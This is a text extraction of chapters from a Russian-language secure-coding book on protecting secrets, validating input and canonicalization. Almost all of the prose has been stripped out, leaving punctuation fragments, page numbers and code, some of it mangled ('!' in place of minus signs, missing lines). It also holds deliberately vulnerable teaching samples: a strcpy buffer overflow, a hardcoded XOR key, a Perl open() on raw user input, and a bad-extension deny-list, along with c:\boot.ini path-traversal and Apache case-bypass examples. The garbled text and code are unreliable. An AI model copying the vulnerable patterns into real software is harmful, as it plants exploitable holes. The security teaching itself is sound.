0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18 );
DEFINE_GUID( GUID_DEVCLASS_NET, \
0x4d36e972L, 0xe325, 0x11ce, 0xbf, 0xc1,
272
II
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18

DEFINE_GUID( GUID_DEVCLASS_DISPLAY, \
0x4d36e968L, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_KEYBOARD,\
0x4d36e96bL, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_MOUSE,
\
0x4d36e96fL, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_SOUND,
\
0x4d36e97cL, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_USB, \
0x36fc9e60L, 0xc465, 0x11cf, 0x80,
0x44, 0x45, 0x53, 0x54, 0x00, 0x00
DEFINE_GUID( GUID_DEVCLASS_DISKDRIVE, \
0x4d36e967L, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_PORTS,
\
0x4d36e978L, 0xe325, 0x11ce, 0xbf,
0x08, 0x00, 0x2b, 0xe1, 0x03, 0x18
DEFINE_GUID( GUID_DEVCLASS_PROCESSOR, \
0x50127dc3L, 0x0f36, 0x415e, 0xa6,
0x4c, 0xb3, 0xbe, 0x91, 0x0B, 0x65
);
0xc1,
);
0xc1,
);
0xc1,
);
0xc1,
);
0x56,
);
0xc1,
);
0xc1,
);
0xcc,
);
DWORD GetPnPStuff(LPGUID pGuid, LPTSTR szData, DWORD cData) {

HDEVINFO hDevInfo = SetupDiGetClassDevs(NULL,
NULL,
NULL,
DIGCF_PRESENT | DIGCF_ALLCLASSES);
if (INVALID_HANDLE_VALUE == hDevInfo)
// .
SP_DEVINFO_DATA did;
did.cbSize = sizeof(SP_DEVINFO_DATA);
for (int i = 0;
SetupDiEnumDeviceInfo(hDevInfo,i,&did);
i++) {
// .
if (*pGuid != did.ClassGuid)
continue;
const DWORD cBuff = 256;
char Buff[cBuff];
DWORD dwRegType = 0, cNeeded = 0;
if (SetupDiGetDeviceRegistryProperty(hDevInfo,
&did,
SPDRP_HARDWAREID,
&dwRegType,
(PBYTE)Buff,
cBuff,
&cNeeded))
// , .
if (cData > cNeeded) {
StringCchCat(szData,cData,"\n\t");
StringCchCat(szData,cData,Buff);
}
}
return 0;
}
DWORD CreateHashFromPnPStuff(HCRYPTHASH hHash) {
struct {
LPGUID guid;
_TCHAR *szDevice;
} device [] =
{
{(LPGUID)&GUID_DEVCLASS_CDROM, "CD"},
{(LPGUID)&GUID_DEVCLASS_DISPLAY, "VDU"},
{(LPGUID)&GUID_DEVCLASS_NET, "NET"},
{(LPGUID)&GUID_DEVCLASS_KEYBOARD, "KBD"},
{(LPGUID)&GUID_DEVCLASS_MOUSE, "MOU"},
{(LPGUID)&GUID_DEVCLASS_USB, "USB"},
{(LPGUID)&GUID_DEVCLASS_PROCESSOR,"CPU"}
};
const DWORD cData = 4096;
TCHAR *pData = new TCHAR[cData];
if (!pData)
return ERROR_NOT_ENOUGH_MEMORY;
DWORD dwErr = 0;
for (int i=0; i < sizeof(device)/sizeof(device[0]); i++) {
ZeroMemory(pData,cData);
if (GetPnPStuff(device[i].guid,pData,cData) == 0) {
#ifdef _DEBUG
printf("%s: %s\n",device[i].szDevice, pData);
#endif
if (!CryptHashData(hHash,
(LPBYTE)pData, lstrlen(pData), 0)) {
273
274
II
break;
}
} else {
}
}
delete [] pData;
return dwErr;
}
int _tmain(int argc, _TCHAR* argv[]) {
HCRYPTHASH hHash = NULL;
if (CryptAcquireContext
(&hProv,NULL,NULL,PROV_RSA_FULL,CRYPT_VERIFYCONTEXT)) {
if (CryptCreateHash(hProv, CALG_SHA1, 0, 0, &hHash)) {
if (CreateHashFromPnPStuff(hHash) == 0) {
// .
BYTE hash[20];
DWORD cbHash = 20;
if (CryptGetHashParam
(hHash,HP_HASHVAL,hash,&cbHash,0)) {
for (DWORD i=0; i < cbHash; i++) {
printf("%02X",hash[i]);
}
}
}
}
}
if (hHash)
if (hProv)
}
if (hHash)
if (hProv)
}
275

. ,
, .
!
,
,
. :
.

,
,
.

, Windows
.
ACL,
. ,
Windows NT 4 ,
?
, Windows NT 4, Windows 2000
API .
, ,
, ,
,
. , Win
dows NT, Windows 2000 , Win
dows 2000 DPAPI, Windows NT 4 LSA.
// CryptProtectData.
typedef BOOL (WINAPI CALLBACK* CPD)
(DATA_BLOB*,LPCWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
// CryptUnprotectData.
typedef BOOL (WINAPI CALLBACK* CUD)
(DATA_BLOB*,LPWSTR,DATA_BLOB*,
PVOID,CRYPTPROTECT_PROMPTSTRUCT*,DWORD,DATA_BLOB*);
HRESULT EncryptData(LPCTSTR szPlaintext) {
HRESULT hr = S_OK;
HMODULE hMod = LoadLibrary(_T("crypt32.dll"));
if (!hMod)
return HRESULT_FROM_WIN32(GetLastError());
CPD cpd = (CPD)GetProcAddress(hMod,_T("CryptProtectData"));
276
II
if (cpd) {
// DPAPI cpd ;
// ,
// ACL.
} else {
// API! LSA.
}
FreeLibrary(hMod);
return hr;
}

:
;
;
;
.

,
. ,
. , , ,
, ,
. ,

.
,
( ) memset ZeroMemory,
memset:
#define ZeroMemory RtlZeroMemory

#define RtlZeroMemory(Destination,Length)!
memset((Destination),0,(Length))
, ,
. ( ,
,
!) malloc,
_msize . Windows
, , HeapCreate
HeapAlloc, , HeapSize.
.
void *p = malloc(N);
...
size_t cb = _msize(p);
memset(p,0,cb);
277
...
C C++
. ,
, ..

(dead code). , ,
, ,
, . :
void DatabaseConnect(char *szDB) {

char szPwd[64];
if (GetPasswordFromUser(szPwd,sizeof(szPwd))) {
if (ConnectToDatabase(szDB, szPwd)) {
// , .
// .
}
}
ZeroMemory(szPwd,sizeof(szPwd));
}
: ! ,
. ZeroMemory!
, , szPwd
DatabaseConnect.
, ?
,
Microsoft Visual C++ .NET. C
Intel x86. C
(;) ( 30).
; 30
: void DatabaseConnect(char *szDB) {

sub
mov
xor
; 31
; 32
:
:
push
mov
lea
push
call
add
test
je
; 33
esp, 68; 00000044H

eax, DWORD PTR ___security_cookie
eax, DWORD PTR __$ReturnAddr$[esp+64]
char szPwd[64];
if (GetPasswordFromUser(szPwd,sizeof(szPwd))) {
64; 00000040H
DWORD PTR __$ArrayPad$[esp+72], eax
eax, DWORD PTR _szPwd$[esp+72]
eax
GetPasswordFromUser
esp, 8
al, al
SHORT $L1344
if (ConnectToDatabase(szDB, szPwd)) {
278
II
mov
lea
push
push
call
add
$L1344:
;
;
;
;
;
;
;
34
35
36
37
38
39
40
edx, DWORD PTR _szDB$[esp+64]

ecx, DWORD PTR _szPwd$[esp+68]
ecx
edx
ConnectToDatabase
esp, 8
:
// , .
:
// .
:
}
:
}
:
:
ZeroMemory(szPwd,sizeof(szPwd));
: }
mov
ecx, DWORD PTR __$ArrayPad$[esp+68]
xor
ecx, DWORD PTR __$ReturnAddr$[esp+64]
add
esp, 68; 00000044H
jmp
@__security_check_cookie@4
DatabaseConnect ENDP
30
/GS, cookie (stackbased
cookie). ( 5.) 3440
, 30 cookie
. ?
_memset. ( , ZeroMemory ,
memset.)

,
. ,
if ,
.
,
. ,
, (
)
. ,
,
(control flow graph),
. ,
.
(dead store elimination).
, ,
(AS IF rule), .
279
, , ,
.
,
,
.
, .
Visual C++ ,
, .
, ,
, , , szPwd
, .
Microsoft Visual C++ 6 7, GNU C (GCC) 3.x.
,
. Windows Security Push (. 2)
(inline) ZeroMemory SecureZeroMemory,
. (
winbase.h):
#ifndef FORCEINLINE
#if (MSC_VER >= 1200)
#define FORCEINLINE __forceinline
#else
#define FORCEINLINE __inline
#endif
#endif
...
FORCEINLINE PVOID SecureZeroMemory(
void *ptr, size_t cnt) {
volatile char *vptr = (volatile char *)ptr;
while (cnt) {
*vptr = 0;
vptr++;
cnt!!;
}
return ptr;
}
,
Windows. :
ZeroMemory memset
.
,
!
memset
. ,
, . ,
280
II
volatile,
.
, ZeroMemory :
*(volatile char*)szPwd = *(volatile char *)szPwd;

,
C/C++ ,
volatile, .
,
, ,
volatile.
, ,
.
#pragma:
#pragma optimize("",off)
// .
#pragma optimize("",on)
.
Og ( Ox,
O1 O2) Visual C++ .

, #pragma.

, , ,
.
.
CryptoAPI.
.
Windows .NET Server 2003 API, CryptProtect
Memory CryptUnprotectMemory; DPAPI,
.
,
, . ,
. .
#define SECRET_LEN 15 // null.
HRESULT hr = S_OK;
LPWSTR pSensitiveText = NULL;
DWORD cbSensitiveText = 0;
DWORD cbPlainText = SECRET_LEN * sizeof(WCHAR);
DWORD dwMod = 0;
281
//
// CYPTPROTECTMEMORY_BLOCK_SIZE.
if (dwMod = cbPlainText % CRYPTPROTECTMEMORY_BLOCK_SIZE)
cbSensitiveText = cbPlainText + (CRYPTPROTECTMEMORY_BLOCK_SIZE ! dwMod);
else
cbSensitiveText = cbPlainText;
pSensitiveText = (LPWSTR)LocalAlloc(LPTR, cbSensitiveText);
if (NULL == pSensitiveText)
return E_OUTOFMEMORY;
// pSensitiveText,
// .
if (!CryptProtectMemory(pSensitiveText,
cbSensitiveText,
CRYPTPROTECTMEMORY_SAME_PROCESS)) {
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
}
// CryptUnprotectMemory .
...
// .
SecureZeroMemory(pSensitiveText, cbSensitiveText);
LocalFree(pSensitiveText);
pSensitiveText = NULL;
return hr;

Platform SDK.

,
.
, .
( , AllocateUserPhysicalPages VirtualLock)
.
,
, (hibernate
mode) , ,

.
282
II
VirtualLock
API VirtualLock Windows NT 4

.
.
( , ,
, ),

.
, .

.

,
.
, , ! , ,
, ,
.
,
.

.
( ,
). , :

,
;

,
, ,
. :
, , ,
, .

(common language runtime, CLR) .NET .NET
Framework
, XML
! .NET
XCOPY,
. DLL
,
! ,
,
283
, .

.
, . ,
XCOPY , ,
, .
, ,
.
public static char[] EncryptAndDecrypt(string data) {

// !!!! .
string key = "yeKterceS";
char[] text = data.ToCharArray();
for (int i = 0; i < text.Length; i++)
text[i] ^= key[i % key.Length];
return text;
}

, LSA DPAPI.
, C#
DPAPI. NativeMethods.cs,
,
(PInvoke), DPAPI.
Secureco2\Chapter09\DataProtection. System.Run
time.InteropServices COM API
.NET.
// DataProtection.cs
namespace Microsoft.Samples.DPAPI {
using System;
using System.Runtime.InteropServices;
using System.Text;
public class DataProtection {
// ,
// Base!64.
public static string ProtectData(string data,
string name,
int flags) {
byte[] dataIn = Encoding.Unicode.GetBytes(data);
byte[] dataOut = ProtectData(dataIn, name, flags);
return (null != dataOut)
? Convert.ToBase64String(dataOut)
: null;
}
// Base!64
284
II
// .
public static string UnprotectData(string data) {
byte[] dataIn = Convert.FromBase64String(data);
byte[] dataOut = UnprotectData(dataIn,
NativeMethods.UIForbidden |
NativeMethods.VerifyProtection);
return (null != dataOut)
? Encoding.Unicode.GetString(dataOut)
: null;
}
////////////////////////
// //
////////////////////////
internal static byte[] ProtectData(byte[] data,
string name,
int dwFlags) {
byte[] cipherText = null;
// .
NativeMethods.DATA_BLOB din =
new NativeMethods.DATA_BLOB();
din.cbData = data.Length;
din.pbData = Marshal.AllocHGlobal(din.cbData);
Marshal.Copy(data, 0, din.pbData, din.cbData);
NativeMethods.DATA_BLOB dout =
NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
// DPAPI.
InitPromptstruct(ref ps);
try {
bool ret =
NativeMethods.CryptProtectData(
ref din,
name,
NativeMethods.NullPtr,
ref ps,
dwFlags, ref dout);
if (ret) {
cipherText = new byte[dout.cbData];
Marshal.Copy(dout.pbData,
cipherText, 0, dout.cbData);
NativeMethods.LocalFree(dout.pbData);
} else {
#if (DEBUG)
Console.WriteLine(" : " +
Marshal.GetLastWin32Error().ToString());
#endif
}
}
finally {
if ( din.pbData != IntPtr.Zero )
Marshal.FreeHGlobal(din.pbData);
}
return cipherText;
}
internal static byte[] UnprotectData(byte[] data,
int dwFlags) {
byte[] clearText = null;
// .
NativeMethods.DATA_BLOB din =
din.cbData = data.Length;
din.pbData = Marshal.AllocHGlobal(din.cbData);
Marshal.Copy(data, 0, din.pbData, din.cbData);
NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps =
new NativeMethods.CRYPTPROTECT_PROMPTSTRUCT();
InitPromptstruct(ref ps);
NativeMethods.DATA_BLOB dout =
try {
bool ret =
NativeMethods.CryptUnprotectData(
ref din,
null,
ref ps,
dwFlags,
ref dout);
if (ret) {
clearText = new byte[ dout.cbData ] ;
Marshal.Copy(dout.pbData,
clearText, 0, dout.cbData);
NativeMethods.LocalFree(dout.pbData);
285
286
II
} else {
#if (DEBUG)
Console.WriteLine(" : " +
Marshal.GetLastWin32Error().ToString());
#endif
}
}
finally {
if ( din.pbData != IntPtr.Zero )
Marshal.FreeHGlobal(din.pbData);
}
return clearText;
}
static internal void InitPromptstruct(
ref NativeMethods.CRYPTPROTECT_PROMPTSTRUCT ps) {
ps.cbSize = Marshal.SizeOf(
typeof(NativeMethods.CRYPTPROTECT_PROMPTSTRUCT));
ps.dwPromptFlags = 0;
ps.hwndApp = NativeMethods.NullPtr;
ps.szPrompt = null;
}
}
}
C# , DataPro
tection:
using Microsoft.Samples.DPAPI;
using System;
using System.Text;
class TestStub {
public static void Main(string[] args) {
string data = ", .";
string name="MySecret";
Console.WriteLine(" : " + data);
string s = DataProtection.ProtectData(data,
name,
NativeMethods.UIForbidden);
if (null == s) {
Console.WriteLine(" ");
return;
}
Console.WriteLine(" : " + s);
s = DataProtection.UnprotectData(s);
Console.WriteLine(" : " + s);
}
}
287
COM+;
, COM+.

.
System.EnterpriseServices.
.
COM+ C#
. .
: +
SN.exe, c:\keys\DemoSrv.snk,
. (strong
named assemblies) 18.
using
using
using
using
System;
System.Reflection;
System.Security.Principal;
System.EnterpriseServices;
[assembly:
[assembly:
[assembly:
[assembly:
ApplicationName("ConstructDemo")]
ApplicationActivation(ActivationOption.Library)]
ApplicationAccessControl]
AssemblyKeyFile(@"c:\keys\DemoSrv.snk")]
namespace DemoSrv {
[ComponentAccessControl]
[SecurityRole("DemoRole", SetEveryoneAccess = true)]
// .
[ConstructionEnabled(Default="Set new data.")]
public class DemoComp : ServicedComponent {
private string _construct;
override protected void Construct(string s) {
_construct = s;
}
public string GetConstructString() {
return _construct;
}
}
}
Microsoft ASP.NET ,
:
Function SomeFunc() As String

' ServicedComponent
' , .
Dim obj As DemoComp = New DemoComp
SomeFunc = obj.GetConstructString()
End Sub
288
II
Component
Services ( ) (. 92). Sys
tem.EnterpriseServices Web http://msdn.microsoft.com/
msdnmag/issues/01/10/complus/complus.asp.
. 92.
COM+

: ,
. :
.NET .
.
, . C#, ErasableData,
.
,
.
.
class ErasableData : IDisposable {

private byte[] _rbSecret;
private GCHandle _ph;
public ErasableData(int size) {
_rbSecret = new byte [size];
}
public void Dispose() {
Array.Clear(_rbSecret, 0, _rbSecret.Length);
_ph.Free();
}
// .
public byte[] Data {
set {
// .
_ph = GCHandle.Alloc(_rbSecret, GCHandleType.Pinned);
// .
byte[] Data = value;
Array.Copy (Data, _rbSecret, Data.Length);
}
get {
return _rbSecret;
}
}
}
class DriverClass {
static void Main(string[] args) {
if (args.Length == 0) {
// !
return;
}
// .
byte [] plaintext =
new UTF8Encoding().GetBytes(args[0]);
// .
using (ErasableData key = new ErasableData(16)) {
key.Data = GetSecretFromUser();
Rijndael aes = Rijndael.Create();
aes.Key = key.Data;
MemoryStream cipherTextStream = new MemoryStream();
CryptoStream cryptoStream = new CryptoStream(
cipherTextStream,
aes.CreateEncryptor(),
CryptoStreamMode.Write);
cryptoStream.Write(plaintext, 0, plaintext.Length);
cryptoStream.FlushFinalBlock();
cryptoStream.Close();
// (IV).
byte [] ciphertext = cipherTextStream.ToArray();
byte [] IV = aes.IV;
// , .
aes.Clear();
cryptoStream.Clear();
}
}
}
289
290
II
:
IDisposable. using C#
, , Dispose.
aes.Clear cryptoStream.Clear. Clear
.
Password,
C#.

, (
) ( )
. Secret.txt. ,
.
FAT-
(
XML)
Web.
: ,
.
XOR
,
XOR. ,
, ,
. ,
, Microsoft Word GIF.
,
XOR .
3DES
, ,
3DES (TripleDES).
: ,
.
3DES

,
, .
, .
, , , , ,
, .
291
3DES

,
, .
, . , ,
.
3DES ,
,
ACL
ACL (
),
, . ,
,
. , ,
, ( )
. , !
? .
3DES,
, ,
ACL
.
,
, . ,
. ,
, .

, .
,
. ,
,
nCipher (http://www.ncipher.com).

,
. :
;
, ;
.
, ,
.
, .
292
II

. :
! . 91
; .
9-1. ,

( ,
)
, :
!
COM+
LSA
DPAPI ( )
DPAPI ( )
. ,

.
,
,
, .
, .
.
10

!
,
? , .
?
, ,

. :
, .
. :
, .
. .
:
.
, ,
,
. , .
?
, ,
, ,
. ,
, ,
, ?
: ,
? ,
.
294
II

: ,
Web. ,
,
. , ,
,
, ,
,
/. ,
, ,
. ,
, .
.
.
!
, !
,
, .
, ,
, ,
Web, .

.
,
,
,
. !

:
,

.
,
,
. ,
. ,
, , .
. ?
? (cross
site scripting) 13.
10
295

,
:
? ?
. :
( !);

;

.
. ?
void CopyData(char *szData) {

char cDest[32];
strcpy(cDest,szData);
// cDest.
...
}
, , , !
, CopyData szData:
. , :
char *szNames[] = {"Michael","Cheryl","Blake"};

CopyData(szNames[1]);

32 . , strcpy .
, , szData,
, ACL, strcpy
, null.
32 , cDest , ,
(. 101).

strcpy(cDest, szData);
strcpy
. 101.
,
szData cDect
, strcpy
, , ,
, . strcpy
, ,
, !
,
296
II
ACL , . ,

, .
, ,
. ,
:
, ,
.
:
void CopyData(char *szData, DWORD cbData) {

const DWORD cbDest = 32;
char cDest[cbDest];
if (szData != NULL && cbDest > cbData)
strncpy(cDest,szData,min(cbDest,cbData));
// cDest.
...
}
(strncpy), szData cbData
, ,
cDest. , ,
,
. ,

. .
, ACL .
, , , ACL
Everyone ().
? !
, c:\boot.ini. , ACL

Everyone;
, .
ACL :
, , ,
.
,

. :
;
(chokepoint) .
10
297
, ,
, .
,
, , .
, ,
.

, .
, .
; ,

(). ,
, (Web,
, , ..),
, ,
.
! , DLL,
ActiveX ,
.
, .
, ,
.
, (. 102).

. 102.
298
II
,
,
.
.
Web ,
(crosssite scripting): ( HTML
) Web.
13. Web
,
. 2001 .
Web, .
Web : ,
( ), ,
. .
, ,
Web , !
.
.

,
: , .
3
,
. ,
. :
;
.
11:
,
.
.
.
. ,
.
, .
.
bool IsBadExtension(char *szFilename) {

bool fIsBad = false;
if (szFilename) {
size_t cFilename = strlen(szFilename);
if (cFilename >= 3) {
char *szBadExt[]
= {".exe", ".com", ".bat", ".cmd"};
10
299
char *szLCase
= _strlwr(_strdup(szFilename));
for (int i=0;
i < sizeof(szBadExt) / sizeof(szBadExt[0]);
i++)
if (szLCase[cFilename!1] == szBadExt[i][3] &&
szLCase[cFilename!2] == szBadExt[i][2] &&
szLCase[cFilename!3] == szBadExt[i][1] &&
szLCase[cFilename!4] == szBadExt[i][0])
fIsBad = true;
}
}
return fIsBad;
}
bool CheckFileExtension(char *szFilename) {
if (!IsBadExtension(szFilename))
if (UploadUserFile(szFilename))
NotifyUserUploadOK(szFilename);
}
? IsBadExtension
.
: , , .
, Perl (.pl)
, Windows Scripting Host (.wsh, .js .vbs),
.
, Microsoft Office
(.doc, .xls ..),
. .

.
Web,

. :
bool IsOKExtension(char *szFilename) {

bool fIsOK = false;
if (szFilename) {
size_t cFilename = strlen(szFilename);
if (cFilename >= 3) {
char *szOKExt[] =
{".txt", ".rtf", ".gif", ".jpg", ".bmp"};
char *szLCase =
_strlwr(_strdup(szFilename));
for (int i=0;
300
II
i < sizeof(szOKExt) / sizeof(szOKExt[0]);

i++)
if (szLCase[cFilename!1] == szOKExt[i][3] &&
szLCase[cFilename!2] == szOKExt[i][2] &&
szLCase[cFilename!3] == szOKExt[i][1] &&
szLCase[cFilename!4] == szOKExt[i][0])
fIsOK = true;
}
}
return fIsOK;
}
, :
(.txt), Rich Text Format (.rtf).
! , ,
, , ,
, .
Perl
Perl :
(tainted), ,
.
(, ) Perl .
:
use strict;
my $filename = <STDIN>;
open (FILENAME, ">> " . $filename) or die $!;
print FILENAME "Hello!";
close FILENAME;
, ,
. \boot.ini.

(T) Perl ,
open:
Insecure dependency in open while running with !T switch at testtaint.pl line 3,

<STDIN> line 1
open .
: .
use strict;
my $filename = <STDIN>;
$filename =~ /(\w{1,8}\.log)/;
open (FILENAME, ">> " . $1) or die $!;
print FILENAME "Hello!";
close FILENAME;
10
301
.
8 .log.
(
), $1,
open. Perl ,
(, /(.*)/ ),
.
, .

.
, . C#
, C++.
RegularExpressions .NET Framework.
using System.Text.RegularExpressions;
...
static bool IsOKExtension(string Filename) {
Regex r =
new Regex(@"txt|rtf|gif|jpg|bmp$",
RegexOptions.IgnoreCase);
return r.Match(Filename).Success;
}
Perl :
sub isOkExtension($) {
$_ = shift;
return /txt|rtf|gif|jpg|bmp$/i ? !1 : 0;
}
, ,
. txt|rtf|gif|jpg|bmp$.
. 101.
10-1.
xxx|yyy
xxx yyy
,
, true. ,
C# RegexOptions.IgnoreCase, Microsoft Windows
.
. 102
. ,
.
302
II
10-2.
.
, {0,}
.
, {1,}
.
, {0,1}
{n}
{n,}
{,m}
{n,m}
n, m
\n
(<>)
() .

.
, (xx)+ ,
, . ,
(?:xx),

aa|bb
aa bb
[abc]
: a, b c
[âbc]
[az]
.
a z
.
(\n \/),
(\d).
() (\1)
\b
\B
\d
. , [09]
\D
. , [^09]
\n, \r, \f, \t, \v
: , ,
,
\p{<>} Unicode;

\s
; , [\f\n\r\t\v]
\S
, ; , [^\f\n\r\t\v]
\w
() ; , [azAZ09_]
\W
( ) ;
, [âzAZ09_]
\xnn \x{nn}
, , nn
\unnnn
\x{nnnn}
Unicode,
, nnnn. ,

( 14)
10
303
(. 103).
10-3.
[afAF09]+
<(.*)>.*<\/\1>
HTML. : (.*)
(\1). , (.*)
FORM, \1 FORM
\d{5}(\d{4})?
^\w{1,32}(?:\.\w{0,4})? $
, . 1 32
,
0 4 .
,
, ?:
: ^ $
.
( )
. ,
( ) .
, , ,
, , .
. ,
:
RegExp r = [a!z]{1,8}\.[a!z]{1,3};
if (r.Match(strFilename).Success) {
// '! strFilename;
// .
} else {
// !!! .
}
, 18
, 13
( ). ?
? , c:\boot.ini?
, c:\boot.ini
boot.ini, . .
, :
^[a!z]{1,8}\.[a!z]{1,3}$
^ , $ .
: ( ) 1
8 , 13
, . , c:\boot.ini
, : \
.
304
II
Unicode
, 8
, ,
! Unicode?
, , ,
? ,
.
Unicode
Unicode Regular Expression Guidelines http://
www.unicode.org/reports/tr18.
Unicode .
Unicode
:
Unicode ( );
Unicode . Windows
UTF16 (little endian). ,
Windows ;
;
Unicode .
: ,
Unicode, , .
, Perl 5.8.0 Unicode.
.NET Framework Microsoft,
. ,
Unicode.
,
, . ,
:

;
( )
, . ,
? cafe?

,
\u30FB:
Regex r = new Regex(@"^[\u30A1!\u30FA]+$");

Unicode \p{<
>},
Unicode. .NET Framework Perl 5.8.0
Unicode, .
10
305
Unicode (L), (M), (N),

(P), (S), (Z) (O C).
:
L ( ):
Lu ( );
Ll ( );
Lt ( ). ,
(diagraph), . ,
,
Latin ExtendedB: U+01C8 Lj, .
: LJ (U+01C7), lj (U+01C9);
Lm (, );
Lo ( , , , );
( ):
Mn (, ,
);
Mc ( , );
Me (, , );
N ( ):
Nd ( 0 9.
, , . ,

Nl (, ), Nd);
Nl ( , U+2160 U+2182);
No ( , ,
);
P ( ):
Pc (, , ,
);
Pd ( );
Ps ( , {, ( [);
Pe ( , }, ) ]);
Pi ( , , );
Pf ( , , , );
Po ( , ?, ! ..);
S ( ):
Sm ();
Sc ( );
Sk (, );
So ( ,
);
306
II
Z ( ):
Zs (, );
Zl ( U+2028, (U+00A6)
);
Zp ( U+2029);
O ():
Cc (, ,
, );
Cf ( , ,
);
Co ( , );
Cn ( );
Cs ( ).
Unicode
http://oss.software.ibm.com/developerworks/opensour
ce/icu/ubrowse.
. Web
,
. :
Regex r = new Regex(@"^\p{Sc}{1}$");

if (r.Match(strInput).Success) {
// !
} else {
// .
}
, ,
Unicode, ($), ( ), ( ),
( ), ( ), ( ) .
,
:
Regex r = new Regex(@"^[\p{L}\p{Mn}\p{Zs}]+$");

\p{Mn} ,
.
.NET Framework ,
\p{IsHebrew} (), \p{IsArabic} () \p{IsKatakana} (
).
Windows 2000,
Windows XP Microsoft Windows .NET Server 2003 Unicode (
Arial Unicode MS* ) Character Map (. 103).
( arialuni.ttf) Microsoft Word 2000/XP.

,
. . .
10
307
, Unicode
Unicode. Unicode http://www.unicode.org/
charts.
. 103. Character Map ,

ASCII
, Perl 5.8.0
Unicode \p{}. http://
dev.perl.org/perl5/news/2002/07/18/580ann/perldelta.html#new%20unico
de%20properties.
! :

.
, ,
!
*
,
.
,
.

V , : ,
.
.
, ,
, 1799 . . .
308
II
Perl C#,

.

, . (:
,
.)
Perl
Perl ,
.
Perl, :
$_ = " 12:15 .";

if (/.*(\d{2}:\d{2}[ap]m)/i) {
print $1;
}
:
, $_.
$_, :
var =~ /<>/;

, C#, C++, Microsoft Visual
Basic .NET, ASP.NET , .NET Framework
System.Text.RegularExpressions.
.
C#, Visual Basic .NET C++.
C#
// C#.
String s = @" 12:15 .";
Regex r = new Regex(@".*(\d{2}:\d{2}[ap]m)",RegexOptions.IgnoreCase);
if (r.Match(s).Success)
Console.Write(r.Match(s).Result("$1"));
Visual Basic .NET

' Visual Basic .NET.
Imports System.Text.RegularExpressions
...
Dim s As String
Dim r As Regex
s = " 12:15 ."
r = New Regex(".*(\d{2}:\d{2}[ap]m)", RegexOptions.IgnoreCase)
10
309
If r.Match(s).Success Then
Console.Write(r.Match(s).Result("$1"))
End If
C++
// C++.
#using <mscorlib.dll>
#include <tchar.h>
#using <system.dll>
using namespace System;
using namespace System::Text;
using namespace System::Text::RegularExpressions;
...
String *s = S" 12:15 .";
Regex *r = new Regex(".*(\\d{2}:\\d{2}[ap]m)",IgnoreCase);
if (r!>Match(s)!>Success)
Console::WriteLine(r!>Match(s)!>Result(S"$1"));
ASP.NET ,
.

JavaScript 1.2
, Perl. 4, Netscape Navigator Microsoft
Internet Explorer .
var r = /.*(\d{2}:\d{2}[ap]m)/;
var s = " 12:15 .";
if (s.match(r))
alert(RegExp.$1);
VBScript 5
RegExp:
Set r = new RegExp

r.Pattern = ".*(\d{2}:\d{2}[ap]m)"
r.IgnoreCase = True
Set m = r.Execute(" 12:15 .")
MsgBox m(0).SubMatches(0)

,
.
ASP JScript VBScript,
Web.
310
II
C++
! , C++
, ,
. STL (Standard
Template Library), STL Regex++ http://
www.boost.org ( http://www.ddj.com/documents/s=1486/ddj0110a/0110a.htm
.)
Microsoft Visual C++ Microsoft Visual Studio .NET
ATL , CAtlRegExp.
, Regex++ CAtlRegExp
;
, .
CAtlRegExp http://msdn.microsoft.com/library/enus/vclib/html/
vclrfcatlregexp.asp.
CAtlRegExp:
#include <AtlRX.h>
CAtlRegExp<> re;
re.Parse(".*{\\d\\d:\\d\\d[ap]m}",FALSE);
CAtlREMatchContext<> mc;
if (re.Match(" 12:15 .", &mc)) {
const CAtlREMatchContext<>::RECHAR* szStart = 0;
const CAtlREMatchContext<>::RECHAR* szEnd = 0;
mc.GetMatch(0,&szStart, &szEnd);
ptrdiff_t nLength = szEnd ! szStart;
printf("%.*s",nLength, szStart);
}
,

, , C++,
C# Visual Basic .NET. UserInput C++:
#include <string>
class UserInput {
public:
UserInput(){};
~UserInput(){};
bool Init(const char* str) {
// .
if(!Validate(str)){
return false;
10
311
} else {
input = str;
return true;
}
}
const char* GetInput(){return input.c_str();}
DWORD Length(){return input.length();}
private:
bool Validate(const char* str);
string input;
};
. ,
,
UserInput, , . ,

Validate. Init ,
.
, Canonicalize.
,
.
,
, :
. ,
. :
.
,
;
. ,
,
. :
, .
,
, .
,
, , , .
11

,
: ,
, , , .
? , .
(Gertrude Stein), . ?
, ?
ROSE* : roze, ro$e, r0se r%6fse? ,
. , , ,
. , %6f
ASCII o.
?
: , ,
, ,
,
( ) .
(canonicalization)
,
.
, ,
,
Web
. , .
Rose . . .
11
313

, , .

(Johann Pachelbel) (16531706). Random House Websters
College Dictionary (Random House, 2000) :
. ,
,
.
,
. , c:\dir\test.dat, test.dat
..\..\test.dat .

c:\dir\test.dat. , , ,
.

, , ,
. ,
, . ,
. ,
, .
Napster

.
2001 ., ,
, Napster,
(Recording Industry Association of America, RIAA),
. Napster
, .
, :
, ,
Napster.
Siouxsie and the Banshees: Candyman AndymanCay (
), 92 degrees 92 degree$,
Deepest Chill Deepest Chi11. ,
, , ,
.
.
Web http://news.cnet.com/news/
010052005042145.html.
314
II
Mac OS X Apache
Web Apache, Mac OS X
Apple,
Hierarchical File System Plus (HFS+). HFS+ ,
Apache.
,
, . ,
scripts :
<Location /scripts>
order deny, allow
deny from all
</Location>
, http://www.northwindtra
ders.com/scripts/index.html, . http://
www.northwindtraders.com/SCRIPTS/index.html, Index.html
.
, HFS+,
, Apache, Mac OS X,
. , Apache SCRIPTS ,
scripts, . HFS+ SCRIPTS
scripts ,
index.html.
